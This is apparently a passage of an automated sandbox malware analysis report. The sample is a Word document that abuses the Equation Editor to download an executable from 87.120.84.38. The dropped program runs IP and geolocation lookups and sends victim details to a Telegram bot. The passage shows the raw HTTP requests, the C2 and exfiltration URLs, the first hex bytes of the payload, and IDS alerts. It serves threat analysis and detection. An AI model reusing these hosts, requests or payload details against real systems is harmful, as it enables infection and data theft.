                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Wed, 30 Oct 2024 07:14:18 GMTContent-Type: application/x-msdos-programContent-Length: 756736Connection: keep-aliveLast-Modified: Wed, 30 Oct 2024 02:10:57 GMTETag: "b8c00-625a8366620d3"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ec 94 21 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 70 0b 00 00 1a 00 00 00 00 00 00 a2 8f 0b 00 00 20 00 00 00 a0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 8f 0b 00 4f 00 00 00 00 a0 0b 00 20 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 6f 0b 00 00 20 00 00 00 70 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 20 17 00 00 00 a0 0b 00 00 18 00 00 00 72 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0b 00 00 02 00 00 00 8a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 8f 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 0c 71 00 00 c4 67 00 00 03 00 00 00 81 00 00 06 d0 d8 00 00 80 b6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 01 00 12 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 28 17 00 00 0a 0a 2b 00 06 2a 00 00 13 30 02 00 13 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 28 18 00 00 0a 0a 2b 00 06 2a 00 13 30 03 00 14 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 28 19 00 00 0a 0a 2b 00 06 2a 13 30 04 00 15 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 28 1a 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 05 00 17 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 0e 04 28 1b 00 00 0a 0a 2b 00 06 2a 00 13 30 06 00 19 00 00 00 01 00 00 11 00 28 18 00 00 06 00 02 03 04 05 0e 04 0e 05 28 1c 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 02 00 19 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 28 1d 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 03 00 1a 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 28 1e 00 00 0a 0a 2b 00 06 2a 00 00 13 30 04 00 1b 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 05
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2010/30/2024%20/%207:45:32%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewASN Name: SHARCOM-ASBG SHARCOM-ASBG
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: reallyfreegeoip.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Roaming\cmnjgyugo61000.exeDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49171 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49169 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49166 -> 158.101.44.242:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49178 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49168 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49182 -> 188.114.97.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49174 -> 188.114.97.3:443
                  Source: global trafficHTTP traffic detected: GET /txt/CLLPdgxhnmwGf5Y.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49167 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: unknownTCP traffic detected without corresponding DNS query: 87.120.84.38
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{18EB24B9-D74C-4691-AA6F-57A74C54BFE9}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/173.254.250.78 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2010/30/2024%20/%207:45:32%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /txt/CLLPdgxhnmwGf5Y.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 87.120.84.38Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 30 Oct 2024 07:14:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: cmnjgyugo61000.exe, 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.401749638.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.401749638.000000000058F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.401554173.00000000005ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/CLLPdgxhnmwGf5Y.exe
                  Source: EQNEDT32.EXE, 00000002.00000002.401749638.000000000058F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/CLLPdgxhnmwGf5Y.exe8/
                  Source: EQNEDT32.EXE, 00000002.00000002.401749638.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.401554173.00000000005ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/CLLPdgxhnmwGf5Y.exeC:
                  Source: EQNEDT32.EXE, 00000002.00000003.401554173.00000000005B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/CLLPdgxhnmwGf5Y.exeT
                  Source: EQNEDT32.EXE, 00000002.00000002.401749638.000000000058F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/CLLPdgxhnmwGf5Y.exej
                  Source: EQNEDT32.EXE, 00000002.00000002.401749638.000000000058F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.84.38/txt/CLLPdgxhnmwGf5Y.exettC:
                  Source: cmnjgyugo61000.exe, 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: cmnjgyugo61000.exe, 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002460000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002453000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000249C000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002443000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023A2000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000248A000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002436000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002396000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002460000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002453000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023E5000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000249C000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000246E000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002443000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000023A2000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.000000000248A000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002436000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908507517.00000000024AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908507517.0000000002301000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000087F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: cmnjgyugo61000.exe, 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, cmnjgyugo61000.exe, 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: cmnjgyugo61000.exe, 00000008.00000002.909451493.0000000005960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: cmnjgyugo61000.exe, 00000008.00000002.909451493.0000000005960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: cmnjgyugo61000.exe, 00000008.00000002.908330033.000000000089B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
